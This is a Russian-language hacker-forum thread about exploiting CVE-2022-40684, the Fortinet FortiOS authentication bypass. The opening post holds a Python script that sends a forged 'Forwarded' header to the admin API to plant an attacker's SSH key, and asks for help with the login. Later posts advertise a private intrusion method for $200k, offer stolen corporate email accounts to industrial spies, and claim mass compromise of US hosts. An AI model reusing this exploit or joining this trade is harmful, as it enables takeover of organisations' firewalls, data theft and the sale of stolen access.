фортик

[CCod]

Всем привет.Эксплуатирую CVE-2022-40684(auth bypass в фортике).Написал такой скрипт для подгрузки своего ssh ключа:
import requests,sys

t=sys.argv[1]
headers={
"User-Agent": "Report Runner",
"Content-Type": "application/json",
"Forwarded": "for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;",}

payload={"ssh-public-key1": "\"id_rsa.pub\""}
r=requests.put(t+"/api/v2/cmdb/system/admin/admin",headers=headers,data=payload,verify=False)

ключ сгенерировал так;
ssh-keygen

При попытке ssh admin@victim -i id_rsa :
nable to negotiate with victim port 22: no matching host key type found. Their offer: ssh-rsa

Как исправить?

 

[National Hazard Agency]

налетели коршуны ебана врт=)

 

[The CaT]

Хоть будет скем пое.аться на выходные, ато уж совсем было сухо в последнее время

 

[C0rtex]

налетели коршуны ебана врт=)

всем достанется не жадничай xD

 

[National Hazard Agency]

Хоть будет скем пое.аться на выходные, ато уж совсем было сухо в последнее время

я вот свой метод надыбал о котором никто не знает и сижу кайфую наблюдаю за пиздецом

 

[Wolverine]

я вот свой метод надыбал о котором никто не знает и сижу кайфую наблюдаю за пиздецом

лишь бы интриги зажечь))

 

[Vendett@]

National Hazard Agency C0rtex The CaT

Поделитесь, с меня кодер, скрипты помогу написать какие надо, возможно автоматизировать.
спасибо

 

[xissay]

я вот свой метод надыбал о котором никто не знает и сижу кайфую наблюдаю за пиздецом

ждем того момента когда ты опять сольеш чет годное в паблик и у всех будет гореть жопа))

 

[Vendett@]

а он уже есть

 

[National Hazard Agency]

ждем того момента когда ты опять сольеш чет годное в паблик и у всех будет гореть жопа))

только после того как сам отработаю все солью без проблем если не продам темку интересующихся много

 

[xissay]

только после того как сам отработаю все солью без проблем если не продам темку интересующихся много

ты же вроде бросил эту тему, не?

 

[National Hazard Agency]

ты же вроде бросил эту тему, не?

я снова в "Уличных гонках"

- черт это Брайан

 

[National Hazard Agency]

National Hazard Agency C0rtex The CaT

Поделитесь, с меня кодер, скрипты помогу написать какие надо, возможно автоматизировать.
спасибо

200 к зелени через гаранта
судя по тому что я сейчас отрабатываю там много жира (не 0 дей, не логи) просто об этом никто не знает

 

[Vendett@]

200 к зелени через гаранта
судя по тому что я сейчас отрабатываю там много жира (не 0 дей, не логи) просто об этом никто не знает

да уже есть

 

[National Hazard Agency]

Дяхан, делай шум и сливай ман уже

БТВ метот мегахорош =) и стоит запрошенной суммы =)
ну че пошумим блэт =)
PS надеюсь зайки выйдут на связь со мной у меня много интересного) Они уже знают что им пиздец но пока меры не принимают а зря.

Удалось их только пощекотать привет Крауд Страйк + Карбонблек + Symantec горите в аду =)

PS 2 акции компании упали после этого поста =D
PS 3 акции твиттера пробили потолок =D
PS 4 ОУ ШИТ МЭН все будет marmaladeno - мат пушка

А ну и еще промышленные шпионы добро пожаловать в личные сообщения забарыжу вам корпоративные почты

 

[drunken master]

только после того как сам отработаю все солью без проблем если не продам темку интересующихся много

Трави по-малу, а то затопчут как лани, бегущие на водопой )))

 

[The CaT]

Это мы проехали есче вчера, ночью
Рыбка просто нас по.рочила, а тема та ne ta < on v svoem omete mytet
кароче неспали 48 часов уже, а по нам не ударяли no prodvinylis procentov tak like na 51 e 200k hosts in yankies for now

 

[prox]

так всетаки какое решение по вопросу ТС есть? та же беда нет тоннеля
ssh: connect to host victim port 22: Connection timed out

 

[The CaT]

Решение есть, работать некому, все ушли на фронт

 

[prox]

Решение есть, работать некому, все ушли на фронт

давай работать а то правда из за фронта без всего останемся